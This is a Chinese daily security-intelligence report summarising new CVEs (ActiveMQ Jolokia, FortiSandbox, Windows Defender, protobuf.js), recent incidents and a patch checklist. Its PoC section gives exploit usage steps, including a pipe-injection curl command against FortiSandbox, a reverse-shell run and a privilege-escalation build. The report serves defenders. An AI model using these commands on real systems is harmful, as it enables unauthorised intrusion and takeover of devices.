WorkshopDL:跨平台玩家的终极Steam创意工坊模组下载神器
2026/4/19 12:39:15
每日安全情报报告 · 2026-04-19
发布时间:2026-04-19 |风险等级:🔴 高危 |情报来源:The Hacker News、FreeBuf、安全客、CISA KEV、NVD、GitHub
一、高危漏洞速报
🔴 CVE-2026-34197 — Apache ActiveMQ Jolokia 远程代码执行(在野利用 ⚠️)
| 字段 | 详情 |
|---|---|
| 漏洞类型 | 远程代码执行(RCE)/ 代码注入 |
| 受影响组件 | Apache ActiveMQ Classic < 5.19.4;6.0.0 ~ 6.2.3 |
| CVSS 评分 | 8.8(高危) |
| 利用状态 | 在野积极利用,已入 CISA KEV(2026-04-18 新增) |
| 披露日期 | 2026-04-07 |
漏洞描述:ActiveMQ 通过 Jolokia JMX-HTTP 桥接暴露了 Broker MBean 上的exec操作,攻击者可利用此接口远程调用任意 Java 方法执行系统命令。该漏洞潜伏时间长达13 年,影响大量未升级的企业消息队列基础设施。部分版本配置下甚至无需认证。CISA 于 2026-04-18 将其正式收录 KEV 目录,要求联邦机构在截止日期前完成修补。
参考链接:
- NVD 漏洞详情
- CISA KEV 目录
- The Hacker News 报道
- FreeBuf 分析
- 阿里云漏洞库
修复建议:立即升级至 Apache ActiveMQ Classic5.19.4+或6.2.4+;对 Jolokia 端点实施访问控制,禁止外网直接访问。
🔴 CVE-2026-39808 — Fortinet FortiSandbox 未授权命令注入 RCE(PoC 已公开)
| 字段 | 详情 |
|---|---|
| 漏洞类型 | OS 命令注入(未经身份验证) |
| 受影响组件 | Fortinet FortiSandbox 4.4.0 ~ 4.4.8 |
| CVSS 评分 | 9.1(严重) |
| 利用状态 | PoC 已公开发布(GitHub),攻击尝试激增 |
| 披露日期 | 2026-04-15 |
漏洞描述:FortiSandbox/fortisandbox/job-detail/tracer-behavior端点未对jidGET 参数进行充分过滤,攻击者可通过管道符(|)注入任意 OS 命令,以 root 权限执行,无需任何认证凭据。PoC 代码已由安全研究员 Samuel de Lucas 公开至 GitHub,利用难度极低,一条curl命令即可完成攻击。
参考链接:
- GitHub PoC:samu-delucas/CVE-2026-39808
- Cyber Press 分析报告
- 新加坡 CSA 安全公告
- 比利时 CCB 公告
修复建议:立即升级至 FortiSandbox4.4.8 以上修复版本;监控/fortisandbox/job-detail/tracer-behavior端点的异常 GET 请求;限制管理接口的外网访问。
🔴 CVE-2026-39813 — Fortinet FortiSandbox 未授权认证绕过
| 字段 | 详情 |
|---|---|
| 漏洞类型 | 认证绕过 |
| 受影响组件 | Fortinet FortiSandbox 4.4.0 ~ 4.4.8 |
| CVSS 评分 | 9.8(严重) |
| 利用状态 | 漏洞已公开,存在主动利用风险 |
| 披露日期 | 2026-04-15 |
漏洞描述:攻击者可通过向 FortiSandbox JRPC API 发送精心构造的 HTTP 请求,绕过身份认证机制,完全接管受影响设备。与 CVE-2026-39808 组合利用可实现完整的未授权 RCE 攻击链,危险性极高。
参考链接:
- OpenCVE 漏洞详情 CVE-2026-39813
- 新加坡 CSA 安全公告
- Undercode Testing 技术分析
🟠 CVE-2026-33825 — Windows Defender BlueHammer 本地权限提升(在野利用 ⚠️)
| 字段 | 详情 |
|---|---|
| 漏洞类型 | 本地权限提升(LPE),TOCTOU 竞争条件 |
| 受影响组件 | Microsoft Defender Antivirus(Windows 10/11/Server 2016-2025) |
| CVSS 评分 | 7.8(高危) |
| 利用状态 | 在野利用确认,CISA KEV 收录,已修复(4月Patch Tuesday) |
| 披露日期 | 2026-04-15 |
漏洞描述:Defender 威胁修复引擎在处理检测到的恶意文件时存在 TOCTOU(检查-使用时间差)竞争条件漏洞。攻击者可通过 NTFS 连接点重定向写入路径,诱使 Defender 以 SYSTEM 权限覆盖任意系统文件,从而实现本地权限提升。与RedSun(云文件回滚路径验证绕过)及UnDefend(Defender 更新机制破坏)组合利用,可形成完整的防御瓦解 + 提权攻击链。RedSun 和 UnDefend 目前仍未修复。
参考链接:
- Picus Security 技术分析
- The Hacker News 报道
- FreeBuf:泄露的 Windows Defender 0Day 正遭活跃利用
- SOCRadar 分析
修复建议:立即应用微软 4 月 Patch Tuesday 安全更新(已修复 BlueHammer/CVE-2026-33825);RedSun 和 UnDefend 暂无补丁,建议临时限制低权限用户对 Defender 功能的访问;部署 EDR 行为监控。
🟠 protobuf.js — 缓冲区溢出 RCE(PoC 已公开,暂无官方补丁)
| 字段 | 详情 |
|---|---|
| 漏洞类型 | 缓冲区溢出 / 远程代码执行 |
| 受影响组件 | Google protobuf.js 6.8.0 ~ 7.2.6 |
| CVSS 评分 | 严重(具体评分待 CVE 正式分配) |
| 利用状态 | PoC 已公开,官方补丁暂未发布 |
| 披露日期 | 2026-04-18 |
漏洞描述:攻击者通过构造恶意 Protocol Buffer 消息,利用protobuf.js解析过程中的输入验证缺陷触发缓冲区溢出,可执行任意 JavaScript 代码,无需身份认证。任何接受并处理 Protocol Buffer 消息的应用端点(REST API、WebSocket 等)均面临威胁,影响 Node.js 和浏览器端大量应用。
参考链接:
- Anavem 漏洞分析报告
- npm protobufjs 官方包
修复建议:暂无官方补丁,建议临时对处理 Protobuf 消息的接口实施严格输入验证和大小限制;使用npm audit确认依赖版本;关注官方 GitHub 补丁发布动态。
二、漏洞 PoC 速递
1. CVE-2026-34197 — Apache ActiveMQ Jolokia RCE
漏洞简述:利用 Jolokia JMX 接口暴露的exec操作执行任意系统命令。
使用步骤:
# Step 1:克隆 PoC 仓库 git clone https://github.com/dinosn/CVE-2026-34197.git cd CVE-2026-34197 # Step 2:安装依赖 pip install requests # Step 3:运行 PoC(需要目标 ActiveMQ 的 Jolokia 端点可访问) # 默认端口 8161(Web Console)或 8080(Jolokia HTTP Bridge) python3 exploit.py -t http://TARGET_IP:8161 -c "id" # Step 4:验证结果(成功则返回 uid=0(root) 等信息)注意:需要目标 ActiveMQ 启用了 Jolokia 接口(默认配置中已启用),部分旧版本无需认证即可利用。
PoC 来源:
- GitHub - dinosn/CVE-2026-34197
- Vulhub 环境复现
2. CVE-2026-39808 — Fortinet FortiSandbox 未授权命令注入
漏洞简述:通过jid参数管道符注入,以 root 身份执行任意 OS 命令。
使用步骤:
# Step 1:克隆 PoC 仓库 git clone https://github.com/samu-delucas/CVE-2026-39808.git cd CVE-2026-39808 # Step 2:安装依赖(仅需 curl 或 Python requests) pip install requests # Step 3:手动验证(无需运行脚本,单条 curl 即可) # 将命令输出写入 Web 根目录 curl "http://TARGET_IP/fortisandbox/job-detail/tracer-behavior?jid=1|id>/var/www/html/output.txt" # Step 4:读取命令执行结果 curl "http://TARGET_IP/output.txt" # 预期输出:uid=0(root) gid=0(root) groups=0(root) # Step 5:运行完整 PoC 脚本获取反弹 Shell python3 exploit.py --target http://TARGET_IP --lhost YOUR_IP --lport 4444PoC 来源:
- GitHub - samu-delucas/CVE-2026-39808
3. CVE-2026-33825 (BlueHammer) — Windows Defender TOCTOU 提权
漏洞简述:利用 Defender 文件修复引擎的 TOCTOU 竞争条件,通过 NTFS 连接点将 SYSTEM 写操作重定向至任意文件路径。
使用步骤:
# PoC 仓库(公开) git clone https://github.com/Nightmare-Eclipse/RedSun.git cd RedSun # Step 1:编译 PoC(需要 Visual Studio / MinGW) # Windows PowerShell 环境执行 msbuild BlueHammer.sln /p:Configuration=Release # Step 2:运行提权 PoC(需要低权限用户执行) .\BlueHammer.exe # Step 3:验证权限提升 whoami # 预期输出:nt authority\system注意:此利用需要本地代码执行权限,主要用于从受限用户账户提升至 SYSTEM。
PoC 来源:
- BlackSwan 威胁公告
- BleepingComputer 验证报道
三、网络安全最新动态
1. 微软 Defender 三重零日:BlueHammer、RedSun、UnDefend 联合在野利用
Huntress 安全团队 2026-04-18 发布紧急预警,披露三个针对 Windows Defender 的零日漏洞自 4 月 10 日起已被攻击者积极利用。其中CVE-2026-33825(BlueHammer)已通过 4 月 Patch Tuesday 修复,但RedSun和UnDefend仍处于未修复状态,数亿 Windows 系统面临持续风险。三个漏洞可组合形成"削弱防御 + 持久提权"的完整攻击链,在渗透测试中已获 SYSTEM 权限验证。
阅读 The Hacker News 报道 | 阅读 FreeBuf 分析
2. Apache ActiveMQ 13 年老漏洞 CVE-2026-34197 加入 CISA KEV,在野攻击激增
CISA 于 2026-04-18 将 CVE-2026-34197 正式纳入已知利用漏洞(KEV)目录。该漏洞源于 ActiveMQ Jolokia JMX 接口设计缺陷,潜伏 13 年后终于被大规模利用。目前 GitHub 已有公开 PoC,攻击者正针对暴露在公网的 ActiveMQ 实例发动攻击。企业应立即排查并升级受影响版本。
阅读 The Hacker News 报道 | 查看 CISA KEV 详情 | Aviatrix 技术分析
3. FortiSandbox 双重严重漏洞 PoC 公开,攻击态势骤然升级
Fortinet 于 2026-04-15 发布安全公告,披露 FortiSandbox 两个严重级别漏洞(CVE-2026-39808 CVSS 9.1 + CVE-2026-39813 CVSS 9.8)。公告发布后仅 2 天,CVE-2026-39808 的 PoC 即被公开至 GitHub,漏洞利用门槛极低。新加坡 CSA、比利时 CCB 等多国安全机构已相继发布紧急预警,要求使用 FortiSandbox 的组织立即升级。
阅读 vpncentral 分析 | 查看 GitHub PoC
4. protobuf.js 零日 RCE:PoC 公开、官方补丁悬空,Node.js 生态拉响警报
2026-04-18,Google 广泛使用的 JavaScript Protocol Buffers 库protobuf.js(版本 6.8.0 ~ 7.2.6)被曝严重 RCE 漏洞,PoC 已公开。官方截至报告发布时尚未发布补丁,数以万计的 Node.js 应用面临无补丁窗口期风险。建议所有使用protobuf.js的项目立即进行依赖自查并实施临时缓解措施。
阅读 Anavem 漏洞报告
5. LiteLLM 供应链投毒腾讯朱雀实验室完整溯源:TeamPCP 窃取 PyPI 发布权限
腾讯朱雀实验室发布完整溯源报告,揭示 3 月 LiteLLM 供应链攻击(版本 1.82.7 和 1.82.8)的完整攻击链:攻击组织TeamPCP先通过 Trivy 扫描器窃取 PyPI 发布凭证,随后将恶意代码嵌入.pth文件(Python 启动时自动执行),实现对 SSH 密钥、云端凭证及所有 LLM API Key 的静默窃取。LiteLLM 月下载量近 1 亿次,此次攻击被认为是 2026 年最严重的 AI 供应链攻击事件之一。
阅读腾讯云开发者报告 | GitHub 完整分析 | dev.to 技术复盘
6. 执法行动:Interpol-related 行动打掉 PowerOFF DDoS 平台,查封 53 个域名
国际执法部门联合行动成功捣毁"PowerOFF"DDoS 租用攻击平台,查封53 个恶意域名,涉及75,000 名注册用户和300 万个犯罪账户。该平台长期向黑市提供低成本 DDoS 攻击服务,被多个勒索软件组织用于勒索辅助打击。此次行动是 2026 年迄今规模最大的 DDoS 生态系统打击行动。
查看 2026-04-18 每日安全资讯
7. 2026 年第 3 周网络安全周报:AI 助力漏洞挖掘,供应链继续失守
本周(4月13-17日)主要安全态势:微软 4 月补丁日创历史第二大规模(163 个 CVE),其中 2 个零日已在野利用;供应链攻击持续泛滥(LiteLLM、Axios、Apifox 等),The Gentlemen 勒索软件单周发动 68 起攻击成为本周最活跃威胁组织;AI 安全军备竞赛加速,Claude Mythos 等模型展现出大规模漏洞挖掘能力,安全行业对 AI 双刃剑风险的讨论愈发激烈。
阅读 2026 年第 3 周安全周报
四、本期重点摘要
| 风险等级 | 漏洞/事件 | 关键点 |
|---|---|---|
| 🔴严重 | CVE-2026-34197 Apache ActiveMQ | 13年老洞、在野利用、CISA KEV 新增 |
| 🔴严重 | CVE-2026-39808/39813 FortiSandbox | 双重严重、PoC 公开、认证绕过+RCE |
| 🟠高危 | CVE-2026-33825 Windows Defender | BlueHammer 在野利用,RedSun/UnDefend 未修复 |
| 🟠高危 | protobuf.js RCE | PoC 公开、无官方补丁、影响 Node.js 生态 |
| 🟡中危 | LiteLLM 供应链攻击溯源 | TeamPCP 全链路披露,AI 供应链信任危机 |
| 🟡信息 | PowerOFF DDoS 平台被打掉 | 53 域名、7.5 万用户、300 万犯罪账户 |
五、今日行动清单(P0 优先)
- Apache ActiveMQ:立即检查版本,升级至 5.19.4+ / 6.2.4+;对 Jolokia 端点设置访问控制列表
- Fortinet FortiSandbox:立即升级至 4.4.8+ 修复版本;监控
tracer-behavior端点访问日志 - Windows Defender:确认 4 月 Patch Tuesday 补丁已部署(BlueHammer/CVE-2026-33825);关注 RedSun/UnDefend 补丁发布
- protobuf.js:运行
npm audit检查是否使用 6.8.0 ~ 7.2.6 版本;对 Protobuf 输入接口实施严格校验 - LiteLLM:确认项目未使用 1.82.7 / 1.82.8 版本;检查环境变量和 SSH 密钥是否泄露
本报告综合自 The Hacker News、FreeBuf、CISA KEV、NVD、GitHub、技术栈周报等权威来源,仅供安全防御研究参考,请勿用于非法用途。